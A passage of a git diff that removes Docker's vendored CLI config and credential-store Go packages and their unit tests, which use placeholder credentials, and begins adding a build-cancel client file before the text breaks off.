ac.Username != "joejoe" || ac.Password != "hello" { - t.Fatalf("Missing data from parsing:\n%q", config) - } - -} - -func TestOldJSONReaderNoFile(t *testing.T) { - js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}` - - config, err := LegacyLoadFromReader(strings.NewReader(js)) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - ac := config.AuthConfigs["https://index.docker.io/v1/"] - if ac.Username != "joejoe" || ac.Password != "hello" { - t.Fatalf("Missing data from parsing:\n%q", config) - } -} - -func TestJSONWithPsFormatNoFile(t *testing.T) { - js := `{ - "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, - "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" -}` - config, err := LoadFromReader(strings.NewReader(js)) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - if config.PsFormat != `table {{.ID}}\t{{.Label "com.docker.label.cpu"}}` { - t.Fatalf("Unknown ps format: %s\n", config.PsFormat) - } - -} - -func TestJSONSaveWithNoFile(t *testing.T) { - js := `{ - "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } }, - "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" -}` - config, err := LoadFromReader(strings.NewReader(js)) - err = config.Save() - if err == nil { - t.Fatalf("Expected error. File should not have been able to save with no file name.") - } - - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatalf("Failed to create a temp dir: %q", err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - f, _ := os.OpenFile(fn, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600) - defer f.Close() - - err = config.SaveToWriter(f) - if err != nil { - t.Fatalf("Failed saving to file: %q", err) - } - buf, err := ioutil.ReadFile(filepath.Join(tmpHome, ConfigFileName)) - if err != nil { - t.Fatal(err) - } - expConfStr := `{ - "auths": { - "https://index.docker.io/v1/": { - "auth": "am9lam9lOmhlbGxv" - } - }, - "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" -}` - if string(buf) != expConfStr { - t.Fatalf("Should have save in new form: \n%s\nnot \n%s", string(buf), expConfStr) - } -} - -func TestLegacyJSONSaveWithNoFile(t *testing.T) { - - js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}` - config, err := LegacyLoadFromReader(strings.NewReader(js)) - err = config.Save() - if err == nil { - t.Fatalf("Expected error. File should not have been able to save with no file name.") - } - - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatalf("Failed to create a temp dir: %q", err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - f, _ := os.OpenFile(fn, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600) - defer f.Close() - - if err = config.SaveToWriter(f); err != nil { - t.Fatalf("Failed saving to file: %q", err) - } - buf, err := ioutil.ReadFile(filepath.Join(tmpHome, ConfigFileName)) - if err != nil { - t.Fatal(err) - } - - expConfStr := `{ - "auths": { - "https://index.docker.io/v1/": { - "auth": "am9lam9lOmhlbGxv", - "email": "user@example.com" - } - } -}` - - if string(buf) != expConfStr { - t.Fatalf("Should have save in new form: \n%s\n not \n%s", string(buf), expConfStr) - } -} diff --git a/vendor/github.com/docker/docker/cliconfig/configfile/file.go b/vendor/github.com/docker/docker/cliconfig/configfile/file.go deleted file mode 100644 index 39097133a4..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/configfile/file.go +++ /dev/null @@ -1,183 +0,0 @@ -package configfile - -import ( - "encoding/base64" - "encoding/json" - "fmt" - "io" - "io/ioutil" - "os" - "path/filepath" - "strings" - - "github.com/docker/docker/api/types" -) - -const ( - // This constant is only used for really old config files when the - // URL wasn't saved as part of the config file and it was just - // assumed to be this value. - defaultIndexserver = "https://index.docker.io/v1/" -) - -// ConfigFile ~/.docker/config.json file info -type ConfigFile struct { - AuthConfigs map[string]types.AuthConfig `json:"auths"` - HTTPHeaders map[string]string `json:"HttpHeaders,omitempty"` - PsFormat string `json:"psFormat,omitempty"` - ImagesFormat string `json:"imagesFormat,omitempty"` - NetworksFormat string `json:"networksFormat,omitempty"` - VolumesFormat string `json:"volumesFormat,omitempty"` - StatsFormat string `json:"statsFormat,omitempty"` - DetachKeys string `json:"detachKeys,omitempty"` - CredentialsStore string `json:"credsStore,omitempty"` - CredentialHelpers map[string]string `json:"credHelpers,omitempty"` - Filename string `json:"-"` // Note: for internal use only - ServiceInspectFormat string `json:"serviceInspectFormat,omitempty"` -} - -// LegacyLoadFromReader reads the non-nested configuration data given and sets up the -// auth config information with given directory and populates the receiver object -func (configFile *ConfigFile) LegacyLoadFromReader(configData io.Reader) error { - b, err := ioutil.ReadAll(configData) - if err != nil { - return err - } - - if err := json.Unmarshal(b, &configFile.AuthConfigs); err != nil { - arr := strings.Split(string(b), "\n") - if len(arr) < 2 { - return fmt.Errorf("The Auth config file is empty") - } - authConfig := types.AuthConfig{} - origAuth := strings.Split(arr[0], " = ") - if len(origAuth) != 2 { - return fmt.Errorf("Invalid Auth config file") - } - authConfig.Username, authConfig.Password, err = decodeAuth(origAuth[1]) - if err != nil { - return err - } - authConfig.ServerAddress = defaultIndexserver - configFile.AuthConfigs[defaultIndexserver] = authConfig - } else { - for k, authConfig := range configFile.AuthConfigs { - authConfig.Username, authConfig.Password, err = decodeAuth(authConfig.Auth) - if err != nil { - return err - } - authConfig.Auth = "" - authConfig.ServerAddress = k - configFile.AuthConfigs[k] = authConfig - } - } - return nil -} - -// LoadFromReader reads the configuration data given and sets up the auth config -// information with given directory and populates the receiver object -func (configFile *ConfigFile) LoadFromReader(configData io.Reader) error { - if err := json.NewDecoder(configData).Decode(&configFile); err != nil { - return err - } - var err error - for addr, ac := range configFile.AuthConfigs { - ac.Username, ac.Password, err = decodeAuth(ac.Auth) - if err != nil { - return err - } - ac.Auth = "" - ac.ServerAddress = addr - configFile.AuthConfigs[addr] = ac - } - return nil -} - -// ContainsAuth returns whether there is authentication configured -// in this file or not. -func (configFile *ConfigFile) ContainsAuth() bool { - return configFile.CredentialsStore != "" || - len(configFile.CredentialHelpers) > 0 || - len(configFile.AuthConfigs) > 0 -} - -// SaveToWriter encodes and writes out all the authorization information to -// the given writer -func (configFile *ConfigFile) SaveToWriter(writer io.Writer) error { - // Encode sensitive data into a new/temp struct - tmpAuthConfigs := make(map[string]types.AuthConfig, len(configFile.AuthConfigs)) - for k, authConfig := range configFile.AuthConfigs { - authCopy := authConfig - // encode and save the authstring, while blanking out the original fields - authCopy.Auth = encodeAuth(&authCopy) - authCopy.Username = "" - authCopy.Password = "" - authCopy.ServerAddress = "" - tmpAuthConfigs[k] = authCopy - } - - saveAuthConfigs := configFile.AuthConfigs - configFile.AuthConfigs = tmpAuthConfigs - defer func() { configFile.AuthConfigs = saveAuthConfigs }() - - data, err := json.MarshalIndent(configFile, "", "\t") - if err != nil { - return err - } - _, err = writer.Write(data) - return err -} - -// Save encodes and writes out all the authorization information -func (configFile *ConfigFile) Save() error { - if configFile.Filename == "" { - return fmt.Errorf("Can't save config with empty filename") - } - - if err := os.MkdirAll(filepath.Dir(configFile.Filename), 0700); err != nil { - return err - } - f, err := os.OpenFile(configFile.Filename, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600) - if err != nil { - return err - } - defer f.Close() - return configFile.SaveToWriter(f) -} - -// encodeAuth creates a base64 encoded string to containing authorization information -func encodeAuth(authConfig *types.AuthConfig) string { - if authConfig.Username == "" && authConfig.Password == "" { - return "" - } - - authStr := authConfig.Username + ":" + authConfig.Password - msg := []byte(authStr) - encoded := make([]byte, base64.StdEncoding.EncodedLen(len(msg))) - base64.StdEncoding.Encode(encoded, msg) - return string(encoded) -} - -// decodeAuth decodes a base64 encoded string and returns username and password -func decodeAuth(authStr string) (string, string, error) { - if authStr == "" { - return "", "", nil - } - - decLen := base64.StdEncoding.DecodedLen(len(authStr)) - decoded := make([]byte, decLen) - authByte := []byte(authStr) - n, err := base64.StdEncoding.Decode(decoded, authByte) - if err != nil { - return "", "", err - } - if n > decLen { - return "", "", fmt.Errorf("Something went wrong decoding auth config") - } - arr := strings.SplitN(string(decoded), ":", 2) - if len(arr) != 2 { - return "", "", fmt.Errorf("Invalid auth configuration file") - } - password := strings.Trim(arr[1], "\x00") - return arr[0], password, nil -} diff --git a/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go b/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go deleted file mode 100644 index 435797f681..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go +++ /dev/null @@ -1,27 +0,0 @@ -package configfile - -import ( - "testing" - - "github.com/docker/docker/api/types" -) - -func TestEncodeAuth(t *testing.T) { - newAuthConfig := &types.AuthConfig{Username: "ken", Password: "test"} - authStr := encodeAuth(newAuthConfig) - decAuthConfig := &types.AuthConfig{} - var err error - decAuthConfig.Username, decAuthConfig.Password, err = decodeAuth(authStr) - if err != nil { - t.Fatal(err) - } - if newAuthConfig.Username != decAuthConfig.Username { - t.Fatal("Encode Username doesn't match decoded Username") - } - if newAuthConfig.Password != decAuthConfig.Password { - t.Fatal("Encode Password doesn't match decoded Password") - } - if authStr != "a2VuOnRlc3Q=" { - t.Fatal("AuthString encoding isn't correct.") - } -} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go b/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go deleted file mode 100644 index ca874cac51..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go +++ /dev/null @@ -1,17 +0,0 @@ -package credentials - -import ( - "github.com/docker/docker/api/types" -) - -// Store is the interface that any credentials store must implement. -type Store interface { - // Erase removes credentials from the store for a given server. - Erase(serverAddress string) error - // Get retrieves credentials from the store for a given server. - Get(serverAddress string) (types.AuthConfig, error) - // GetAll retrieves all the credentials from the store. - GetAll() (map[string]types.AuthConfig, error) - // Store saves credentials in the store. - Store(authConfig types.AuthConfig) error -} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go deleted file mode 100644 index b4733709b1..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go +++ /dev/null @@ -1,22 +0,0 @@ -package credentials - -import ( - "os/exec" - - "github.com/docker/docker/cliconfig/configfile" -) - -// DetectDefaultStore sets the default credentials store -// if the host includes the default store helper program. -func DetectDefaultStore(c *configfile.ConfigFile) { - if c.CredentialsStore != "" { - // user defined - return - } - - if defaultCredentialsStore != "" { - if _, err := exec.LookPath(remoteCredentialsPrefix + defaultCredentialsStore); err == nil { - c.CredentialsStore = defaultCredentialsStore - } - } -} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go deleted file mode 100644 index 63e8ed4010..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go +++ /dev/null @@ -1,3 +0,0 @@ -package credentials - -const defaultCredentialsStore = "osxkeychain" diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go deleted file mode 100644 index 864c540f6c..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go +++ /dev/null @@ -1,3 +0,0 @@ -package credentials - -const defaultCredentialsStore = "secretservice" diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go deleted file mode 100644 index 519ef53dcd..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go +++ /dev/null @@ -1,5 +0,0 @@ -// +build !windows,!darwin,!linux - -package credentials - -const defaultCredentialsStore = "" diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go deleted file mode 100644 index fb6a9745cf..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go +++ /dev/null @@ -1,3 +0,0 @@ -package credentials - -const defaultCredentialsStore = "wincred" diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go deleted file mode 100644 index ca73a384d4..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go +++ /dev/null @@ -1,53 +0,0 @@ -package credentials - -import ( - "github.com/docker/docker/api/types" - "github.com/docker/docker/cliconfig/configfile" - "github.com/docker/docker/registry" -) - -// fileStore implements a credentials store using -// the docker configuration file to keep the credentials in plain text. -type fileStore struct { - file *configfile.ConfigFile -} - -// NewFileStore creates a new file credentials store. -func NewFileStore(file *configfile.ConfigFile) Store { - return &fileStore{ - file: file, - } -} - -// Erase removes the given credentials from the file store. -func (c *fileStore) Erase(serverAddress string) error { - delete(c.file.AuthConfigs, serverAddress) - return c.file.Save() -} - -// Get retrieves credentials for a specific server from the file store. -func (c *fileStore) Get(serverAddress string) (types.AuthConfig, error) { - authConfig, ok := c.file.AuthConfigs[serverAddress] - if !ok { - // Maybe they have a legacy config file, we will iterate the keys converting - // them to the new format and testing - for r, ac := range c.file.AuthConfigs { - if serverAddress == registry.ConvertToHostname(r) { - return ac, nil - } - } - - authConfig = types.AuthConfig{} - } - return authConfig, nil -} - -func (c *fileStore) GetAll() (map[string]types.AuthConfig, error) { - return c.file.AuthConfigs, nil -} - -// Store saves the given credentials in the file store. -func (c *fileStore) Store(authConfig types.AuthConfig) error { - c.file.AuthConfigs[authConfig.ServerAddress] = authConfig - return c.file.Save() -} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go b/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go deleted file mode 100644 index efed4e9040..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go +++ /dev/null @@ -1,139 +0,0 @@ -package credentials - -import ( - "io/ioutil" - "testing" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cliconfig" - "github.com/docker/docker/cliconfig/configfile" -) - -func newConfigFile(auths map[string]types.AuthConfig) *configfile.ConfigFile { - tmp, _ := ioutil.TempFile("", "docker-test") - name := tmp.Name() - tmp.Close() - - c := cliconfig.NewConfigFile(name) - c.AuthConfigs = auths - return c -} - -func TestFileStoreAddCredentials(t *testing.T) { - f := newConfigFile(make(map[string]types.AuthConfig)) - - s := NewFileStore(f) - err := s.Store(types.AuthConfig{ - Auth: "super_secret_token", - Email: "foo@example.com", - ServerAddress: "https://example.com", - }) - - if err != nil { - t.Fatal(err) - } - - if len(f.AuthConfigs) != 1 { - t.Fatalf("expected 1 auth config, got %d", len(f.AuthConfigs)) - } - - a, ok := f.AuthConfigs["https://example.com"] - if !ok { - t.Fatalf("expected auth for https://example.com, got %v", f.AuthConfigs) - } - if a.Auth != "super_secret_token" { - t.Fatalf("expected auth `super_secret_token`, got %s", a.Auth) - } - if a.Email != "foo@example.com" { - t.Fatalf("expected email `foo@example.com`, got %s", a.Email) - } -} - -func TestFileStoreGet(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - "https://example.com": { - Auth: "super_secret_token", - Email: "foo@example.com", - ServerAddress: "https://example.com", - }, - }) - - s := NewFileStore(f) - a, err := s.Get("https://example.com") - if err != nil { - t.Fatal(err) - } - if a.Auth != "super_secret_token" { - t.Fatalf("expected auth `super_secret_token`, got %s", a.Auth) - } - if a.Email != "foo@example.com" { - t.Fatalf("expected email `foo@example.com`, got %s", a.Email) - } -} - -func TestFileStoreGetAll(t *testing.T) { - s1 := "https://example.com" - s2 := "https://example2.com" - f := newConfigFile(map[string]types.AuthConfig{ - s1: { - Auth: "super_secret_token", - Email: "foo@example.com", - ServerAddress: "https://example.com", - }, - s2: { - Auth: "super_secret_token2", - Email: "foo@example2.com", - ServerAddress: "https://example2.com", - }, - }) - - s := NewFileStore(f) - as, err := s.GetAll() - if err != nil { - t.Fatal(err) - } - if len(as) != 2 { - t.Fatalf("wanted 2, got %d", len(as)) - } - if as[s1].Auth != "super_secret_token" { - t.Fatalf("expected auth `super_secret_token`, got %s", as[s1].Auth) - } - if as[s1].Email != "foo@example.com" { - t.Fatalf("expected email `foo@example.com`, got %s", as[s1].Email) - } - if as[s2].Auth != "super_secret_token2" { - t.Fatalf("expected auth `super_secret_token2`, got %s", as[s2].Auth) - } - if as[s2].Email != "foo@example2.com" { - t.Fatalf("expected email `foo@example2.com`, got %s", as[s2].Email) - } -} - -func TestFileStoreErase(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - "https://example.com": { - Auth: "super_secret_token", - Email: "foo@example.com", - ServerAddress: "https://example.com", - }, - }) - - s := NewFileStore(f) - err := s.Erase("https://example.com") - if err != nil { - t.Fatal(err) - } - - // file store never returns errors, check that the auth config is empty - a, err := s.Get("https://example.com") - if err != nil { - t.Fatal(err) - } - - if a.Auth != "" { - t.Fatalf("expected empty auth token, got %s", a.Auth) - } - if a.Email != "" { - t.Fatalf("expected empty email, got %s", a.Email) - } -} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go deleted file mode 100644 index dec2dbcb82..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go +++ /dev/null @@ -1,144 +0,0 @@ -package credentials - -import ( - "github.com/docker/docker-credential-helpers/client" - "github.com/docker/docker-credential-helpers/credentials" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cliconfig/configfile" -) - -const ( - remoteCredentialsPrefix = "docker-credential-" - tokenUsername = "" -) - -// nativeStore implements a credentials store -// using native keychain to keep credentials secure. -// It piggybacks into a file store to keep users' emails. -type nativeStore struct { - programFunc client.ProgramFunc - fileStore Store -} - -// NewNativeStore creates a new native store that -// uses a remote helper program to manage credentials. -func NewNativeStore(file *configfile.ConfigFile, helperSuffix string) Store { - name := remoteCredentialsPrefix + helperSuffix - return &nativeStore{ - programFunc: client.NewShellProgramFunc(name), - fileStore: NewFileStore(file), - } -} - -// Erase removes the given credentials from the native store. -func (c *nativeStore) Erase(serverAddress string) error { - if err := client.Erase(c.programFunc, serverAddress); err != nil { - return err - } - - // Fallback to plain text store to remove email - return c.fileStore.Erase(serverAddress) -} - -// Get retrieves credentials for a specific server from the native store. -func (c *nativeStore) Get(serverAddress string) (types.AuthConfig, error) { - // load user email if it exist or an empty auth config. - auth, _ := c.fileStore.Get(serverAddress) - - creds, err := c.getCredentialsFromStore(serverAddress) - if err != nil { - return auth, err - } - auth.Username = creds.Username - auth.IdentityToken = creds.IdentityToken - auth.Password = creds.Password - - return auth, nil -} - -// GetAll retrieves all the credentials from the native store. -func (c *nativeStore) GetAll() (map[string]types.AuthConfig, error) { - auths, err := c.listCredentialsInStore() - if err != nil { - return nil, err - } - - // Emails are only stored in the file store. - // This call can be safely eliminated when emails are removed. - fileConfigs, _ := c.fileStore.GetAll() - - authConfigs := make(map[string]types.AuthConfig) - for registry := range auths { - creds, err := c.getCredentialsFromStore(registry) - if err != nil { - return nil, err - } - ac, _ := fileConfigs[registry] // might contain Email - ac.Username = creds.Username - ac.Password = creds.Password - ac.IdentityToken = creds.IdentityToken - authConfigs[registry] = ac - } - - return authConfigs, nil -} - -// Store saves the given credentials in the file store. -func (c *nativeStore) Store(authConfig types.AuthConfig) error { - if err := c.storeCredentialsInStore(authConfig); err != nil { - return err - } - authConfig.Username = "" - authConfig.Password = "" - authConfig.IdentityToken = "" - - // Fallback to old credential in plain text to save only the email - return c.fileStore.Store(authConfig) -} - -// storeCredentialsInStore executes the command to store the credentials in the native store. -func (c *nativeStore) storeCredentialsInStore(config types.AuthConfig) error { - creds := &credentials.Credentials{ - ServerURL: config.ServerAddress, - Username: config.Username, - Secret: config.Password, - } - - if config.IdentityToken != "" { - creds.Username = tokenUsername - creds.Secret = config.IdentityToken - } - - return client.Store(c.programFunc, creds) -} - -// getCredentialsFromStore executes the command to get the credentials from the native store. -func (c *nativeStore) getCredentialsFromStore(serverAddress string) (types.AuthConfig, error) { - var ret types.AuthConfig - - creds, err := client.Get(c.programFunc, serverAddress) - if err != nil { - if credentials.IsErrCredentialsNotFound(err) { - // do not return an error if the credentials are not - // in the keyckain. Let docker ask for new credentials. - return ret, nil - } - return ret, err - } - - if creds.Username == tokenUsername { - ret.IdentityToken = creds.Secret - } else { - ret.Password = creds.Secret - ret.Username = creds.Username - } - - ret.ServerAddress = serverAddress - return ret, nil -} - -// listCredentialsInStore returns a listing of stored credentials as a map of -// URL -> username. -func (c *nativeStore) listCredentialsInStore() (map[string]string, error) { - return client.List(c.programFunc) -} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go b/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go deleted file mode 100644 index 7664faf9e1..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go +++ /dev/null @@ -1,355 +0,0 @@ -package credentials - -import ( - "encoding/json" - "fmt" - "io" - "io/ioutil" - "strings" - "testing" - - "github.com/docker/docker-credential-helpers/client" - "github.com/docker/docker-credential-helpers/credentials" - "github.com/docker/docker/api/types" -) - -const ( - validServerAddress = "https://index.docker.io/v1" - validServerAddress2 = "https://example.com:5002" - invalidServerAddress = "https://foobar.example.com" - missingCredsAddress = "https://missing.docker.io/v1" -) - -var errCommandExited = fmt.Errorf("exited 1") - -// mockCommand simulates interactions between the docker client and a remote -// credentials helper. -// Unit tests inject this mocked command into the remote to control execution. -type mockCommand struct { - arg string - input io.Reader -} - -// Output returns responses from the remote credentials helper. -// It mocks those responses based in the input in the mock. -func (m *mockCommand) Output() ([]byte, error) { - in, err := ioutil.ReadAll(m.input) - if err != nil { - return nil, err - } - inS := string(in) - - switch m.arg { - case "erase": - switch inS { - case validServerAddress: - return nil, nil - default: - return []byte("program failed"), errCommandExited - } - case "get": - switch inS { - case validServerAddress: - return []byte(`{"Username": "foo", "Secret": "bar"}`), nil - case validServerAddress2: - return []byte(`{"Username": "", "Secret": "abcd1234"}`), nil - case missingCredsAddress: - return []byte(credentials.NewErrCredentialsNotFound().Error()), errCommandExited - case invalidServerAddress: - return []byte("program failed"), errCommandExited - } - case "store": - var c credentials.Credentials - err := json.NewDecoder(strings.NewReader(inS)).Decode(&c) - if err != nil { - return []byte("program failed"), errCommandExited - } - switch c.ServerURL { - case validServerAddress: - return nil, nil - default: - return []byte("program failed"), errCommandExited - } - case "list": - return []byte(fmt.Sprintf(`{"%s": "%s", "%s": "%s"}`, validServerAddress, "foo", validServerAddress2, "")), nil - } - - return []byte(fmt.Sprintf("unknown argument %q with %q", m.arg, inS)), errCommandExited -} - -// Input sets the input to send to a remote credentials helper. -func (m *mockCommand) Input(in io.Reader) { - m.input = in -} - -func mockCommandFn(args ...string) client.Program { - return &mockCommand{ - arg: args[0], - } -} - -func TestNativeStoreAddCredentials(t *testing.T) { - f := newConfigFile(make(map[string]types.AuthConfig)) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - err := s.Store(types.AuthConfig{ - Username: "foo", - Password: "bar", - Email: "foo@example.com", - ServerAddress: validServerAddress, - }) - - if err != nil { - t.Fatal(err) - } - - if len(f.AuthConfigs) != 1 { - t.Fatalf("expected 1 auth config, got %d", len(f.AuthConfigs)) - } - - a, ok := f.AuthConfigs[validServerAddress] - if !ok { - t.Fatalf("expected auth for %s, got %v", validServerAddress, f.AuthConfigs) - } - if a.Auth != "" { - t.Fatalf("expected auth to be empty, got %s", a.Auth) - } - if a.Username != "" { - t.Fatalf("expected username to be empty, got %s", a.Username) - } - if a.Password != "" { - t.Fatalf("expected password to be empty, got %s", a.Password) - } - if a.IdentityToken != "" { - t.Fatalf("expected identity token to be empty, got %s", a.IdentityToken) - } - if a.Email != "foo@example.com" { - t.Fatalf("expected email `foo@example.com`, got %s", a.Email) - } -} - -func TestNativeStoreAddInvalidCredentials(t *testing.T) { - f := newConfigFile(make(map[string]types.AuthConfig)) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - err := s.Store(types.AuthConfig{ - Username: "foo", - Password: "bar", - Email: "foo@example.com", - ServerAddress: invalidServerAddress, - }) - - if err == nil { - t.Fatal("expected error, got nil") - } - - if !strings.Contains(err.Error(), "program failed") { - t.Fatalf("expected `program failed`, got %v", err) - } - - if len(f.AuthConfigs) != 0 { - t.Fatalf("expected 0 auth config, got %d", len(f.AuthConfigs)) - } -} - -func TestNativeStoreGet(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - validServerAddress: { - Email: "foo@example.com", - }, - }) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - a, err := s.Get(validServerAddress) - if err != nil { - t.Fatal(err) - } - - if a.Username != "foo" { - t.Fatalf("expected username `foo`, got %s", a.Username) - } - if a.Password != "bar" { - t.Fatalf("expected password `bar`, got %s", a.Password) - } - if a.IdentityToken != "" { - t.Fatalf("expected identity token to be empty, got %s", a.IdentityToken) - } - if a.Email != "foo@example.com" { - t.Fatalf("expected email `foo@example.com`, got %s", a.Email) - } -} - -func TestNativeStoreGetIdentityToken(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - validServerAddress2: { - Email: "foo@example2.com", - }, - }) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - a, err := s.Get(validServerAddress2) - if err != nil { - t.Fatal(err) - } - - if a.Username != "" { - t.Fatalf("expected username to be empty, got %s", a.Username) - } - if a.Password != "" { - t.Fatalf("expected password to be empty, got %s", a.Password) - } - if a.IdentityToken != "abcd1234" { - t.Fatalf("expected identity token `abcd1234`, got %s", a.IdentityToken) - } - if a.Email != "foo@example2.com" { - t.Fatalf("expected email `foo@example2.com`, got %s", a.Email) - } -} - -func TestNativeStoreGetAll(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - validServerAddress: { - Email: "foo@example.com", - }, - }) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - as, err := s.GetAll() - if err != nil { - t.Fatal(err) - } - - if len(as) != 2 { - t.Fatalf("wanted 2, got %d", len(as)) - } - - if as[validServerAddress].Username != "foo" { - t.Fatalf("expected username `foo` for %s, got %s", validServerAddress, as[validServerAddress].Username) - } - if as[validServerAddress].Password != "bar" { - t.Fatalf("expected password `bar` for %s, got %s", validServerAddress, as[validServerAddress].Password) - } - if as[validServerAddress].IdentityToken != "" { - t.Fatalf("expected identity to be empty for %s, got %s", validServerAddress, as[validServerAddress].IdentityToken) - } - if as[validServerAddress].Email != "foo@example.com" { - t.Fatalf("expected email `foo@example.com` for %s, got %s", validServerAddress, as[validServerAddress].Email) - } - if as[validServerAddress2].Username != "" { - t.Fatalf("expected username to be empty for %s, got %s", validServerAddress2, as[validServerAddress2].Username) - } - if as[validServerAddress2].Password != "" { - t.Fatalf("expected password to be empty for %s, got %s", validServerAddress2, as[validServerAddress2].Password) - } - if as[validServerAddress2].IdentityToken != "abcd1234" { - t.Fatalf("expected identity token `abcd1324` for %s, got %s", validServerAddress2, as[validServerAddress2].IdentityToken) - } - if as[validServerAddress2].Email != "" { - t.Fatalf("expected no email for %s, got %s", validServerAddress2, as[validServerAddress2].Email) - } -} - -func TestNativeStoreGetMissingCredentials(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - validServerAddress: { - Email: "foo@example.com", - }, - }) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - _, err := s.Get(missingCredsAddress) - if err != nil { - // missing credentials do not produce an error - t.Fatal(err) - } -} - -func TestNativeStoreGetInvalidAddress(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - validServerAddress: { - Email: "foo@example.com", - }, - }) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - _, err := s.Get(invalidServerAddress) - if err == nil { - t.Fatal("expected error, got nil") - } - - if !strings.Contains(err.Error(), "program failed") { - t.Fatalf("expected `program failed`, got %v", err) - } -} - -func TestNativeStoreErase(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - validServerAddress: { - Email: "foo@example.com", - }, - }) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - err := s.Erase(validServerAddress) - if err != nil { - t.Fatal(err) - } - - if len(f.AuthConfigs) != 0 { - t.Fatalf("expected 0 auth configs, got %d", len(f.AuthConfigs)) - } -} - -func TestNativeStoreEraseInvalidAddress(t *testing.T) { - f := newConfigFile(map[string]types.AuthConfig{ - validServerAddress: { - Email: "foo@example.com", - }, - }) - f.CredentialsStore = "mock" - - s := &nativeStore{ - programFunc: mockCommandFn, - fileStore: NewFileStore(f), - } - err := s.Erase(invalidServerAddress) - if err == nil { - t.Fatal("expected error, got nil") - } - - if !strings.Contains(err.Error(), "program failed") { - t.Fatalf("expected `program failed`, got %v", err) - } -} diff --git a/vendor/github.com/docker/docker/client/build_cancel.go b/vendor/github.com/docker/docker/client/build_cancel.go new file mode 100644 index 0000000000..4cf8c980a9 --- /dev/null +++ b/vendor/github.com/docker/docker/client/build_cancel.go @@ -0,0 +1,21 @@ +package client // import "github.com/docker/docker/client" + +import ( + "net/url" + + "golang.org/x/net/context" +) + +// 